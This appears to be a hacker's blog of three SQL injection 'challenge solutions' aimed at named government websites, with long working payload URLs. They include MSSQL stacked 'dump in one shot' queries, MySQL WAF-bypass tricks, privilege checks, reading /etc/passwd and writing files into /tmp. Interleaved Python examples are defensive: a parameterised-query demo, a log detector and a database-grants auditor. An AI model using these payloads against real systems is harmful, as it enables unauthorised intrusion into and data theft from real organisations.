SQLi Challenge Solution 4
First of all, hello guys :D ... Hope you all are fine... Today I'm going to show you the solution of my SQLi Challenge 4, which is based on MSSQL injection.
First of all we'll look at my challenge rules/tasks.
Target is dlc2.academy.gov.ua and we have to print the cyber name, version, DB, user, tables and columns.
Now follow me :D ..
1. We'll find the injection point... as you know, .asp and .aspx extensions are common in MSSQL injection..
So, now it's time to use dorks :p
site:dlc2.academy.gov.ua inurl:.asp?id=
First Result : http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}
2. Now we'll check whether it's vulnerable or not and try to balance the query..
Putting a single quote:
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'
:D yeahhhhhh it's showing an error .........
Now we'll try to balance the query using comments..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'-- - > No Error
O.o no error once the single quote is followed by a comment .. it means :D the injection is string based (the parameter sits inside quotes in the query)...
3. Now we'll find the total number of columns...
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 5-- - > Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 3-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 4-- - > No Error
:D so, the total number of columns is 4..
4. Now we'll use UNION SELECT..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select 1,2,3,4-- - > Error
:3 as always, the int problem (the original columns are not all integer types, so the integer literals fail to convert)...
Now we'll change them all to null..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,null-- - > No Error
-_- as I said....
Now we'll convert them to int one by one..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,4-- - > No Error
and now it's showing the vulnerable column "4" :D yeahhhhhhhhhhhhhhhh Hurrayyy <3 .........
5. Now time for DIOS (dump in one shot)...
For detailed MSSQLi, visit: securityidiots.com
Now I'm going to use the DIOS of master Zen <3
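Why the single-quote probe in steps 2-4 behaves the way it does, and what the fix on the application side looks like, as an added example that is not part of the original post. sqlite3 stands in for MSSQL so it runs offline; the table, its rows and the crsprops-style lookup are constructed for this illustration, and the comment syntax `-- -` happens to be valid in both engines.

```python
"""Added example (not from the original post): the concatenated query that the
post's probes break, beside the parameterised query that treats the same input
as data.  sqlite3 stands in for MSSQL; table and rows are constructed."""
import sqlite3

# Constructed sample data standing in for the course-properties table.
SAMPLE_ROWS = [
    ("{F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}", "Intro course", "open", 4),
    ("{11111111-2222-3333-4444-555555555555}", "Second course", "closed", 9),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course (id TEXT, title TEXT, status TEXT, seats INTEGER)")
    conn.executemany("INSERT INTO course VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_concat(conn, course_id):
    """Vulnerable form: the parameter is pasted inside the quoted literal,
    so a quote in the input ends the literal and the rest becomes SQL."""
    sql = "SELECT id, title, status, seats FROM course WHERE id = '" + course_id + "'"
    return conn.execute(sql).fetchall()


def lookup_param(conn, course_id):
    """Hardened form: the value travels as a bound parameter and is never
    parsed as SQL, whatever quotes or keywords it contains."""
    sql = "SELECT id, title, status, seats FROM course WHERE id = ?"
    return conn.execute(sql, (course_id,)).fetchall()


def probe(conn, fn, course_id):
    """Return ('ok', rows) or ('error', message) so the difference is visible."""
    try:
        return ("ok", fn(conn, course_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


GOOD_ID = "{F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}"
# The same probe shapes the post sends: bare quote, quote plus comment, and an
# ORDER BY at and just past the real column count.
PROBES = [
    GOOD_ID + "'",
    GOOD_ID + "'-- -",
    GOOD_ID + "' order by 4-- -",
    GOOD_ID + "' order by 5-- -",
]


def compare():
    """For each probe: (outcome with concatenation, outcome with a parameter)."""
    conn = make_db()
    return {p: (probe(conn, lookup_concat, p)[0], probe(conn, lookup_param, p)[0]) for p in PROBES}


if __name__ == "__main__":
    for p, (concat_result, param_result) in compare().items():
        print(f"{p!r:60} concat={concat_result:5} param={param_result}")
```

The concatenated lookup errors on the bare quote and on `order by 5`, returns a row on `'-- -` and on `order by 4`, which is exactly the error/no-error oracle the post reads. The parameterised lookup never errors and never matches, because no row has an id containing a quote.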
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
:p Lemme make some changes ... adding new lines + the user
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
:D Done
Now time to inject our DIOS
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}';BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
Injected ;)
Now we have to dump our DIOS..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,(select output from dark_challenge_solution)-- -
Picture here..
:o WTF??? DIOS not injected successfully >:o >:(
-_- No. We have to inject the site with a manual DIOS
For this I'll use this DIOS, thanks to Foysal Hossain (Root X Force) :D
'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
Putting the DIOS into the site and injecting..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
o.O why isn't it showing...? :3 Ohhhh we have to add " and 1=0 " so the original query returns no row and the UNION row is the one displayed
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' and 1=0 union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
B| Done. Site injected successfully...
Hope you like my tutorial of my challenge solution :D ... Thanks for watching
Sunday, January 3, 2016
SQLi Challenge Solution 3
So, first of all hello guys ^_^ as always :p
My tasks and rules were these...
As you know, MySQL union-based injection will not work.
Now we'll think about error based.. but sadly some words in that query are not acceptable according to my rules..
Now we'll think XPath will work, but it's not suited for DIOS .. it shows less data, and polygon injection shows a bit more data than XPath injection.
For this challenge, dual injection is best; it shows the most data of all these injections..
and the query for dual injection is this:
and(select(!dark-~007)from(select (@@version) dark)angel)--+-
So, let's start...
1. We'll see whether the website is vulnerable or not
http://bpc.gov.bd/gallery.php?id=6' > error
2. Now we'll check which comment is working
http://bpc.gov.bd/gallery.php?id=6'--+- > No error, it means this comment is working ^_^
3. We'll execute the dual injection query.
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@version) dark)angel)--+- > WAF -_-
4. We'll bypass the WAF.. We'll put \ inside a keyword to learn which word is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@ver\sion) dark)angel)--+- > no error, it means 'version' is the blocked word
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (/*!50000@@version*/) dark)angel)--+- > :) Bypassed...
5. First we'll print the cyber name, version, database and user in the DIOS...
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat(/*!50000@@version*/,database(),user()) dark)angel)--+- > Again WAF -_-
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (c\oncat(/*!50000@@version*/,dat\abase(),us\er()) dark)angel)--+- > no error, now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (/*!50000@@version*/,/*!50000database*/(),/*!50000user*/())) dark)angel)--+-
Now we'll add the cyber name, Version ::, Database ::, User :: and <br>
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e)) dark)angel)--+- > Done! Printed
6. Now we'll dump tables and columns to complete the DIOS...
To dump tables and columns I'll use this query:
(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x)
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x))) dark)angel)--+- > Blocked by WAF
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) fr\om(select(@:=0x00),(select(0) fro\m(info\rmation_schema.columns)wh\ere(ta\ble_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,ta\ble_name,0x203a3a20,colu\mn_name))))x))) dark)angel)--+- > No error, now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) /*!50000from*/(select(@:=0x00),(select(0) /*!50000from*/(/*!50000information_schema*/.columns)/*!50000where*/(/*!50000table_schema*/!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))) dark)angel)--+- > DIOS bypassed :D
Challenge solved!
Happy injecting....
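The flip side of steps 4-6: a keyword filter that looks at the raw request misses `@@ver\sion` and `/*!50000from*/`, which is exactly why the WAF above could be walked around. The detector below, an added example that is not part of the original post, covers both Solution 4 (the MSSQL `order by` / `union select null` probes) and Solution 3 (the MySQL version-comment and backslash tricks): it URL-decodes each request, strips the `/*!NNNNN ... */` wrappers and stray backslashes, and only then matches the indicators. The access-log lines are constructed for this example in Apache combined format; the addresses and timestamps are made up.

```python
"""Added example (not from the original post): normalise-then-match detection
for the request shapes in Solutions 4 and 3.  Log lines are constructed."""
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format).  The query strings
# mirror the shapes of the requests in the post, not any real traffic.
SAMPLE_LOG = r"""
203.0.113.5 - - [14/Jun/2016:10:01:02 +0000] "GET /client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Jun/2016:10:01:09 +0000] "GET /client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'%20order%20by%205--%20- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Jun/2016:10:01:15 +0000] "GET /client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'%20union%20select%20null,null,null,null--%20- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jan/2016:09:12:44 +0000] "GET /gallery.php?id=6'%20and(select(!dark-~007)from(select%20(@@ver\sion)%20dark)angel)--+- HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jan/2016:09:12:51 +0000] "GET /gallery.php?id=6'%20and(select(!dark-~007)from(select%20(/*!50000@@version*/)%20dark)angel)--+- HTTP/1.1" 500 290 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jan/2016:09:13:30 +0000] "GET /gallery.php?id=6'%20and(select(@)%20/*!50000from*/(select(@:=0x00),(select(0)%20/*!50000from*/(/*!50000information_schema*/.columns)))x)--+- HTTP/1.1" 500 290 "-" "Mozilla/5.0"
192.0.2.9 - - [24/Dec/2015:08:00:00 +0000] "GET /content.php?id=275'%20union%20select%201,2,load_file('/etc/passwd'),4--+ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.9 - - [24/Dec/2015:08:00:30 +0000] "GET /gallery.php?id=6 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
""".strip().splitlines()

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
SOURCE_IP = re.compile(r"^(\S+) ")
# MySQL executable comment: /*!50000word*/ is run as "word" by the server.
VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)

INDICATORS = {
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+"),
    "union_select": re.compile(r"union\s+select\b"),
    "schema_enum": re.compile(r"information_schema\b"),
    "version_fingerprint": re.compile(r"@@version\b"),
    "file_read": re.compile(r"load_file\s*\("),
    "file_write": re.compile(r"into\s+outfile\b"),
    "xml_path_concat": re.compile(r"for\s+xml\s+path\b"),
    "stacked_query": re.compile(r";\s*begin\s+declare\b"),
}


def normalise(request_target):
    """Undo the encodings an attacker layers on before keyword matching."""
    text = request_target
    for _ in range(2):          # double-decode; unquote_plus also maps '+' to space
        text = unquote_plus(text)
    text = VERSION_COMMENT.sub(r"\1", text)   # /*!50000@@version*/ -> @@version
    text = text.replace("\\", "")             # @@ver\sion -> @@version
    return re.sub(r"\s+", " ", text).lower()


def classify(line):
    """Return a finding dict for a suspicious line, or None for a clean one."""
    m = REQUEST.search(line)
    if not m:
        return None
    norm = normalise(m.group(1))
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(norm))
    if not hits:
        return None
    return {"ip": SOURCE_IP.match(line).group(1), "hits": hits, "normalised": norm}


def scan(lines):
    return [rec for rec in (classify(l) for l in lines) if rec]


def per_source(lines):
    """Count flagged requests per client address, the usual pivot for triage."""
    counts = {}
    for rec in scan(lines):
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["hits"])
    print(per_source(SAMPLE_LOG))
```

The two `gallery.php` probes with `@@ver\sion` and `/*!50000@@version*/` collapse to the same normalised text, so one rule catches both; the raw-text approach the post defeats would have matched neither. Per-source counts are the practical output: one blocked probe is noise, a run of them from one address within a minute is an enumeration in progress.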
#D4RK_4NG31
Thursday, December 24, 2015
SQLi Challenge Solution 2
Okay, first hello to all :p .. The method used in this challenge is the root privileges method.
Okay then, let's start:
1. First of all we'll see whether the site is vulnerable or not.
http://www.police.gov.bd/content.php?id=275' > Error :D the text disappeared, it means it's vulnerable
2. Now time to find which comment is working
http://www.police.gov.bd/content.php?id=275 order by 2222222-- > No error. It means we now have to try string-based SQLi
http://www.police.gov.bd/content.php?id=275' order by 222222--+ > Error :D it's working
2. Now we have to find the vulnerable columns
http://www.police.gov.bd/content.php?id=275' order by 20--+ > error
http://www.police.gov.bd/content.php?id=275' order by 15--+ > No error
http://www.police.gov.bd/content.php?id=275' order by 17--+ > Error
http://www.police.gov.bd/content.php?id=275' order by 16--+ > No error
So, the total number of columns is 16.
Now we have to find which columns are displayed.
http://www.police.gov.bd/content.php?id=275' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ > The vulnerable column is 3
3. Now we have to see whether the website's database user has root privileges or not.
To see it, we have to use this query.
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)
Use it in the vulnerable column.
http://www.police.gov.bd/content.php?id=275' union select 1,2,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),4,5,6,7,8,9,10,11,12,13,14,15,16--+
Yeahhhh :D it's showing root@localhost > Yes, it means we have root privileges.
4. Now we have to check the website path for uploading a shell
Users' home paths are listed in the passwd file, so we'll load that file to see the path. For this we'll use the following function:
load_file('/etc/passwd')
http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16--+
:'( No luck, no path there
5. If you can't find the path, then remember the tmp dir is always writable ^_^
To write a file into the tmp folder we'll use the following command
into outfile '/tmp/test.txt'
http://www.police.gov.bd/content.php?id=275' union select 1,2,'Testing',4,5,6,7,8,9,10,11,12,13,14,15,16 into outfile '/tmp/test.txt'--+
6. To open your uploaded file we'll use load_file
http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/tmp/test.txt'),4,5,6,7,8,9,10,11,12,13,14,15,16--+
Wahoooooo :)))) It's working .....
Hope you like my tutorial (solution of the 2nd challenge).
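Everything from step 3 onwards works only because the web application's database account is root with the FILE privilege. The script below is the defender's mirror image of the USER_PRIVILEGES check, added here as an example that is not part of the original post: it parses the text of `SHOW GRANTS FOR <account>` and flags the grants that make `load_file()` and `INTO OUTFILE` reachable from a web form. The grant lines are constructed; the quoting style follows MySQL 5.x output.

```python
"""Added example (not from the original post): audit SHOW GRANTS output for the
privileges that turn a SQL injection into file read/write.  Input constructed."""
import re

# Privileges a read-mostly web application never needs; FILE and ALL PRIVILEGES
# are the ones that directly enable load_file() and INTO OUTFILE.
DANGEROUS = {"ALL PRIVILEGES", "FILE", "SUPER", "GRANT OPTION"}

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO (?P<who>\S+)(?P<opt> WITH GRANT OPTION)?",
    re.I,
)

# Constructed SHOW GRANTS lines for three accounts on one server.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE ON `cms`.* TO 'webapp'@'localhost'",
    "GRANT SELECT, FILE ON *.* TO 'legacy'@'%'",
]


def parse_grant(line):
    """Return (privilege set, scope, account) for one SHOW GRANTS line."""
    m = GRANT_RE.match(line.strip())
    if not m:
        raise ValueError("not a GRANT statement: " + line)
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    if m.group("opt"):
        privs.add("GRANT OPTION")
    return privs, m.group("scope"), m.group("who")


def audit(grant_lines):
    """Map each account to the findings a reviewer would raise (empty = fine)."""
    findings = {}
    for line in grant_lines:
        privs, scope, who = parse_grant(line)
        issues = findings.setdefault(who, [])
        for p in sorted(privs & DANGEROUS):
            issues.append(f"{p} on {scope}")
        # USAGE on *.* is MySQL's "no privileges" placeholder and is harmless;
        # any real privilege granted globally instead of per schema is not.
        if scope == "*.*" and privs != {"USAGE"}:
            issues.append("global scope (*.*) instead of a single schema")
    return findings


def accounts_needing_review(grant_lines):
    """Accounts with at least one finding, sorted for a stable report."""
    return sorted(who for who, issues in audit(grant_lines).items() if issues)


if __name__ == "__main__":
    for who, issues in audit(SAMPLE_GRANTS).items():
        print(who, "->", issues or "least privilege OK")
```

Only `'webapp'@'localhost'` passes: SELECT/INSERT/UPDATE on one schema is what a content page needs, and with that account the `load_file('/etc/passwd')` and `into outfile '/tmp/test.txt'` steps above fail with a permission error. Setting `secure_file_priv` to a dedicated directory (or NULL, which disables file operations entirely) closes the same hole at the server level even if a FILE grant slips through.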
#D4RK_4NG31